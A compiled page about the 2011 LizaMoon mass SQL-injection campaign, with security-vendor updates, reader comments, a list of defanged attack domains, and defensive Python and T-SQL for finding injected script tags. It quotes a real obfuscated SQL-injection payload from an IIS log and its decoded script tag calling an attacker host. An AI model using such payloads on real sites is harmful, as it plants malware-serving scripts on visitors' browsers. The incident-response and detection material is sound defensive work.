Video: LizaMoon in action
LizaMoon mass injection hits over 226,000 URLs (was 28,000)
Posted: 29 Mar 2011 10:15 AM
Websense Security Labs and the Websense Threatseeker Network have identified a new malicious mass-injection campaign that we call LizaMoon. Websense customers are protected with the Advanced Classification Engine.
UPDATE1: A Google Search now returns over 226,000 results. Do note that this is a count of unique URLs, not infected hosts. Still, it makes it one of the bigger mass-injection attacks we have ever seen.
UPDATE2: We have been monitoring the attack since it started and the number of compromised URLs is still increasing: 380,000 URLs so far. Moreover, more domains besides lizamoon.com are now involved.
UPDATE3: 500,000 hits at this time. It's growing.
Millions of Sites Hit with Mass-Injection Cyberattack
By Sarah Jacobsson Purewal, PCWorld Apr 1, 2011 6:21 AM
Hundreds of thousands -- and possibly millions -- of websites have been hit with a cyberattack that some are calling "one of the biggest mass-injection attacks we've ever seen."
Update on LizaMoon mass-injection and Q&A
The LizaMoon mass-injection campaign is still ongoing and more than 500,000 pages have a script link to lizamoon.com according to preliminary Google Search results. We have also been able to identify several other URLs that are injected in the exact same way, so the attack is even bigger than we originally thought. All in all, a search on Google returns more than 1,500,000 results that have a link with the same URL structure as the initial attack. Google Search results aren't always great indicators of how prevalent or widespread an attack is, as Google counts each unique URL or page rather than each domain or site, but they do give some indication of the scope of the problem if you look at how the numbers go up or down over time.
Update1: The Google search now returns 1,750,000 results.
Additional injected URLs
Here's a list of domains that we have identified so far (with help from blog comment posters; thanks for that guys!).
hxxp://lizamoon.com/ur.php
hxxp://tadygus.com/ur.php
hxxp://alexblane.com/ur.php
hxxp://alisa-carter.com/ur.php
hxxp://online-stats201.info/ur.php
hxxp://stats-master111.info/ur.php
hxxp://agasi-story.info/ur.php
hxxp://general-st.info/ur.php
hxxp://extra-service.info/ur.php
hxxp://t6ryt56.info/ur.php
hxxp://sol-stats.info/ur.php
hxxp://google-stats49.info/ur.php
hxxp://google-stats45.info/ur.php
hxxp://google-stats50.info/ur.php
hxxp://stats-master88.info/ur.php
hxxp://eva-marine.info/ur.php
hxxp://stats-master99.info/ur.php
hxxp://worid-of-books.com/ur.php
hxxp://google-server43.info/ur.php
hxxp://tzv-stats.info/ur.php
hxxp://milapop.com/ur.php
hxxp://pop-stats.info/ur.php
hxxp://star-stats.info/ur.php
hxxp://multi-stats.info/ur.php
hxxp://google-stats44.info/ur.php
hxxp://books-loader.info/ur.php
hxxp://google-stats73.info/ur.php
hxxp://google-stats47.info/ur.php
Jay Barnes said on Wednesday, March 30, 2011 11:54 AM
Also observed hxxp://lizamoon.com/ur.php containing javascript redirect to hxxp://system-scanner-uyxt.co.cc/scan1b/237?sessionId=05005504[...], which was already a dead hostname by the time user received redirect. Server that contained lizamoon.com reference for this user was hxxp://www.equusnow.com, which appears to be clean at the moment.
Similar (or identical) campaign may involve redirects to hxxp://system-scanner-eopa.co.cc containing fake-av. Another compromised server, hxxp://hccems.com/hr-adriana-lima-vogue-spain/, earlier today contained javascript code redirecting to system-scanner-eopa.co.cc only if the request used a google referer. That hccems.com page, with a google referer, currently redirects to hxxp://xz163v92.dyndns-ip.com/3/ (also fake-av).
Maye said on Wednesday, March 30, 2011 5:56 PM
This same attack is now happening with tadygus.com instead of lizamoon.
Antony said on Friday, April 01, 2011 10:44 AM
Just to be clear to those who actually know very little about database servers...a database server is not "vulnerable to SQL injection". Poorly-programmed and secured *applications* are vulnerable to SQL injection. It really annoys me to see databases blamed for poor application development practices.
Toyotawhizguy said on Friday, April 01, 2011 4:54 PM
You can block malicious sites by editing your "hosts" file using Notepad. For example, add the following line:
127.0.0.1 www.lizamoon.com #attack site 03/29/11
You can also list the site's IP address instead of the domain name:
127.0.0.1 95.64.9.18 #attack site 03/29/11
I maintain my "hosts" file as "read only" after editing, this protects it from malicious attacks.
Pete said on Saturday, April 02, 2011 12:11 PM
I am still confused by the SQL injection reference. Usually, an SQL injection is a vulnerability in an application which is then exploited for a persistent XSS or CSRF. What application has the SQL injection vulnerability? I get that RSS may pick up the persistent XSS but it has to get into a DB to start with and it can't get into a DB without an app. Which app has the vulnerability?
Arun: No answer found so far
Websense updated: 1st April 2011 12:16pm PT
The domain stats-master111.info was registered on October 21, 2010 which could mean the first attack happened then but we don't have any evidence of that. The first confirmed case that we know of is from December 2010, but we didn't make the connection to LizaMoon until today. The last domain, milapop.com, was registered today.
Q: How does the script get added to the compromised sites?
A: We're still looking into that. We know that it uses SQL Injection to do it and not XSS as some of our blog readers have suggested.
Q: How do you know it's using SQL Injection?
A: We have been contacted by people who have seen the code in their Microsoft SQL databases. Initially we only received reports of users running Microsoft SQL Server 2000 and 2005 being hit but since then we have also received reports of websites using Microsoft SQL Server 2008 being injected as well.
Q: Could this mean that there's a vulnerability in Microsoft SQL Server 2000 and 2005?
A: No. Everything points to this being a vulnerability in a web application. We don't know which one(s) yet, but SQL injection attacks work by smuggling SQL commands into the server inside unsanitized input. That doesn't mean there is a vulnerability in SQL Server itself; it means the web application isn't validating input from the user correctly.
Q: When will the LizaMoon attack be over?
A: Not anytime soon. We're still seeing references to Gumblar, which was a mass-injection attack found in 2009.
Stack Overflow:
Here is an example of the value of the cs-uri-query field for one of the IIS log entries.
surveyID=91+update+usd_ResponseDetails+set+categoryName=REPLACE(cast(categoryName+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(103)%2Bchar(111)%2Bchar(111)%2Bchar(103)%2Bchar(108)%2Bchar(101)%2Bchar(45)%2Bchar(115)%2Bchar(116)%2Bchar(97)%2Bchar(116)%2Bchar(115)%2Bchar(53)%2Bchar(48)%2Bchar(46)%2Bchar(105)%2Bchar(110)%2Bchar(102)%2Bchar(111)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))--
I don't understand how the above code works but apparently this is what is being sent in a query string to corrupt columns in our database tables. We have shut down our site for the time being. We can remove the scripts from the database but that doesn't prevent it from being corrupted again when we bring the site back online.
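The query string above is readable once the char(n)+char(m)+... chains are turned back into text. The following is an added example, not code from the original page or from the Stack Overflow poster: it parses IIS W3C log records, flags any cs-uri-query with this UPDATE ... SET ... REPLACE(CAST(... shape, decodes the char() chains, and pulls out the target table, the target column and the two REPLACE() arguments. The sample log is constructed; its second record carries the exact query string quoted above, while the field layout, timestamps and client addresses are assumptions.

```python
"""Flag and decode LizaMoon-style UPDATE ... REPLACE(... char(n)+char(m) ...) payloads in IIS W3C logs."""
import re
from urllib.parse import unquote_plus

# A run of char(n)+char(m)+...; the \b keeps it from matching the "char(8000)" inside "varchar(8000)".
CHAR_CHAIN = re.compile(r"(?:\bchar\(\d+\)\+?)+", re.IGNORECASE)
CHAR_ONE = re.compile(r"\bchar\((\d+)\)", re.IGNORECASE)
# Statement shape used by the attack: UPDATE <table> SET <col> = REPLACE(CAST(...
SIGNATURE = re.compile(r"\bupdate\b.+\bset\b.+\breplace\s*\(\s*cast\s*\(", re.IGNORECASE | re.DOTALL)
UPDATE_SHAPE = re.compile(r"\bupdate\s+(\S+)\s+set\s+(\S+?)\s*=\s*replace\s*\((.*)\)\s*--", re.IGNORECASE | re.DOTALL)
CAST_WRAP = re.compile(r"^cast\s*\((.*)\s+as\s+n?varchar\(\d+\)\)$", re.IGNORECASE | re.DOTALL)


def decode_char_chains(sql):
    """Rewrite every char(n)+char(m)... run as the quoted string literal it builds."""
    def to_literal(m):
        text = "".join(chr(int(n)) for n in CHAR_ONE.findall(m.group(0)))
        return "'" + text.replace("'", "''") + "'"
    return CHAR_CHAIN.sub(to_literal, sql)


def split_args(s):
    """Split a SQL argument list on top-level commas, honouring parentheses and quotes."""
    args, buf, depth, in_quote = [], [], 0, False
    for ch in s:
        if ch == "'":
            in_quote = not in_quote
        elif not in_quote:
            if ch == "(":
                depth += 1
            elif ch == ")":
                depth -= 1
            elif ch == "," and depth == 0:
                args.append("".join(buf).strip())
                buf = []
                continue
        buf.append(ch)
    args.append("".join(buf).strip())
    return args


def unwrap(arg):
    """Strip a CAST(x AS varchar(n)) wrapper and, if x is a string literal, its quotes."""
    m = CAST_WRAP.match(arg.strip())
    inner = m.group(1).strip() if m else arg.strip()
    if len(inner) >= 2 and inner[0] == inner[-1] == "'":
        inner = inner[1:-1].replace("''", "'")
    return inner


def analyse_query(cs_uri_query):
    """Return a finding dict for a LizaMoon-style cs-uri-query, or None for anything else."""
    decoded = unquote_plus(cs_uri_query)  # '+' -> space, %2B -> '+', as IIS logged it
    if not SIGNATURE.search(decoded):
        return None
    readable = decode_char_chains(decoded)
    m = UPDATE_SHAPE.search(readable)
    if not m:
        return {"sql": readable}
    args = split_args(m.group(3))
    if len(args) != 3:
        return {"sql": readable}
    return {
        "table": m.group(1),
        "column": m.group(2),
        "find": unwrap(args[1]),     # the string REPLACE() looks for
        "replace": unwrap(args[2]),  # the string it substitutes
        "sql": readable,
    }


def parse_w3c(log_text):
    """Yield one dict per record of an IIS W3C log, keyed by the #Fields: header."""
    fields = None
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split(" ")))


def scan_log(log_text):
    """Return [(record, finding)] for every record whose query string carries the payload."""
    hits = []
    for rec in parse_w3c(log_text):
        finding = analyse_query(rec.get("cs-uri-query", "-"))
        if finding:
            hits.append((rec, finding))
    return hits


# Constructed sample log: a benign request, the query string from the Stack Overflow post, an unrelated request.
SAMPLE_LOG = """#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2011-03-29 10:15:01 203.0.113.5 GET /survey.aspx surveyID=91 200
2011-03-29 10:15:02 203.0.113.7 GET /survey.aspx surveyID=91+update+usd_ResponseDetails+set+categoryName=REPLACE(cast(categoryName+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(103)%2Bchar(111)%2Bchar(111)%2Bchar(103)%2Bchar(108)%2Bchar(101)%2Bchar(45)%2Bchar(115)%2Bchar(116)%2Bchar(97)%2Bchar(116)%2Bchar(115)%2Bchar(53)%2Bchar(48)%2Bchar(46)%2Bchar(105)%2Bchar(110)%2Bchar(102)%2Bchar(111)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))-- 200
2011-03-29 10:15:03 203.0.113.9 GET /index.aspx - 200
"""

if __name__ == "__main__":
    for rec, f in scan_log(SAMPLE_LOG):
        print(rec["date"], rec["time"], rec["c-ip"], rec["cs-uri-stem"])
        print("  UPDATE %s SET %s: replace %r with %r" % (f["table"], f["column"], f["find"], f["replace"]))
```

For the record quoted above the decoder reports table usd_ResponseDetails, column categoryName, find string `</title><script src=http://google-stats50.info/ur.php></script>` and a single space as the replacement, so this particular statement rewrites that tag out of the column; the same statement with the two arguments reversed (find `</title>`, substitute `</title><script ...></script>`) would plant it. Two things make the entry stand out in a log regardless of the domain used: a query parameter that should be a number followed by an UPDATE, and a CAST(char(n)+char(m)+... ) chain, which is the obfuscation the payload relies on to avoid quoting the literal.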
SQL CODE TO IDENTIFY INFECTED TABLES AND COLUMNS
(Tested & working – Arun)
-- Scan every string column of every base table for the injected tag.
-- The LIKE pattern was lost from this page when the <script> text was
-- stripped; '%<script%' is reconstructed from the decoded payload above.
SET NOCOUNT ON;

DECLARE @pattern nvarchar(100);
SET @pattern = N'%<script%';

DECLARE @schema sysname, @table sysname, @col sysname;
DECLARE @sql nvarchar(4000), @cnt int;

DECLARE c1 CURSOR LOCAL FAST_FORWARD FOR
    SELECT c.TABLE_SCHEMA, c.TABLE_NAME, c.COLUMN_NAME
    FROM INFORMATION_SCHEMA.COLUMNS c
    JOIN INFORMATION_SCHEMA.TABLES t
      ON t.TABLE_SCHEMA = c.TABLE_SCHEMA AND t.TABLE_NAME = c.TABLE_NAME
    WHERE t.TABLE_TYPE = 'BASE TABLE'      -- skip views
      AND c.DATA_TYPE IN ('nvarchar', 'nchar', 'varchar', 'char', 'text', 'ntext')
    ORDER BY c.TABLE_SCHEMA, c.TABLE_NAME, c.COLUMN_NAME;

OPEN c1;
FETCH NEXT FROM c1 INTO @schema, @table, @col;
WHILE @@FETCH_STATUS = 0
BEGIN
    -- Identifiers are QUOTENAME()d and the pattern is passed as a parameter,
    -- so this dynamic SQL is not itself a new injection point.
    SET @sql = N'SELECT @cnt = COUNT(*) FROM ' + QUOTENAME(@schema) + N'.' + QUOTENAME(@table)
             + N' WHERE ' + QUOTENAME(@col) + N' LIKE @pat';
    EXEC sp_executesql @sql, N'@pat nvarchar(100), @cnt int OUTPUT', @pat = @pattern, @cnt = @cnt OUTPUT;

    IF @cnt > 0
    BEGIN
        PRINT CAST(@cnt AS varchar(10)) + ' records found in '
            + QUOTENAME(@schema) + '.' + QUOTENAME(@table) + '.' + QUOTENAME(@col);
        -- Show the affected values so the injected tag can be inspected before cleanup.
        SET @sql = N'SELECT ' + QUOTENAME(@col) + N' FROM ' + QUOTENAME(@schema) + N'.' + QUOTENAME(@table)
                 + N' WHERE ' + QUOTENAME(@col) + N' LIKE @pat';
        EXEC sp_executesql @sql, N'@pat nvarchar(100)', @pat = @pattern;
    END

    FETCH NEXT FROM c1 INTO @schema, @table, @col;
END
CLOSE c1;
DEALLOCATE c1;
..I'll update if I found any news. Please share your experience and solutions.